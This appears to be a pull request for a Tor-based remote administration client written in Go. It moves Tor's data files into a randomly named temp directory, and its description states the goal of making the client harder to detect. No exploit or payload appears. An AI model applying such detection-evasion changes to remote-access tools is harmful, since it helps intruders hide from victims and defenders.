### PR TITLE
Obfuscate the location of Tor files in temp dir

### DIFF
--- a/torat_client/netclient.go
+++ b/torat_client/netclient.go
@@ -5,6 +5,7 @@ package client
 import (
 	"crypto/tls"
 	"crypto/x509"
+	"io/ioutil"
 	"log"
 	"net"
 	"net/rpc"
@@ -36,7 +37,18 @@ func NetClient() {
 	log.Println("NetClient")
 	initServer()
 	var conf tor.StartConf
-	conf = tor.StartConf{ProcessCreator: embedded.NewCreator()}
+
+	tmp_dir, err := ioutil.TempDir("", "")
+	if err != nil {
+		log.Println("[NetClient] [!] Could not create temp dir for Tor: ", err)
+		return
+	}
+
+	conf = tor.StartConf{
+		ProcessCreator:    embedded.NewCreator(),
+		DataDir:           tmp_dir,
+		RetainTempDataDir: false,
+	}
 
 	t, err := tor.Start(nil, &conf)
 	if err != nil {

--- a/torat_client/netclient.go
+++ b/torat_client/netclient.go
@@ -36,7 +36,6 @@ func connect(dialer *tor.Dialer) (net.Conn, error) {
 func NetClient() {
 	log.Println("NetClient")
 	initServer()
-	var conf tor.StartConf
 
 	tmp_dir, err := ioutil.TempDir("", "")
 	if err != nil {
@@ -44,7 +43,7 @@ func NetClient() {
 		return
 	}
 
-	conf = tor.StartConf{
+	conf := tor.StartConf{
 		ProcessCreator:    embedded.NewCreator(),
 		DataDir:           tmp_dir,
 		RetainTempDataDir: false,
@@ -57,9 +56,9 @@ func NetClient() {
 	}
 
 	api := new(API)
-	rpc_err := rpc.Register(api)
-	if rpc_err != nil {
-		log.Fatal(rpc_err)
+	rpcErr := rpc.Register(api)
+	if rpcErr != nil {
+		log.Fatal(rpcErr)
 	}
 
 	defer t.Close()

--- a/torat_client/netclient.go
+++ b/torat_client/netclient.go
@@ -37,7 +37,7 @@ func NetClient() {
 	log.Println("NetClient")
 	initServer()
 
-	tmp_dir, err := ioutil.TempDir("", "")
+	tmpDir, err := ioutil.TempDir("", "")
 	if err != nil {
 		log.Println("[NetClient] [!] Could not create temp dir for Tor: ", err)
 		return
@@ -45,7 +45,7 @@ func NetClient() {
 
 	conf := tor.StartConf{
 		ProcessCreator:    embedded.NewCreator(),
-		DataDir:           tmp_dir,
+		DataDir:           tmpDir,
 		RetainTempDataDir: false,
 	}
 


### PR DESCRIPTION
This is a pretty straightforward fix for #206. This hides the Tor directory in the OS's temp area making it harder to detect hopefully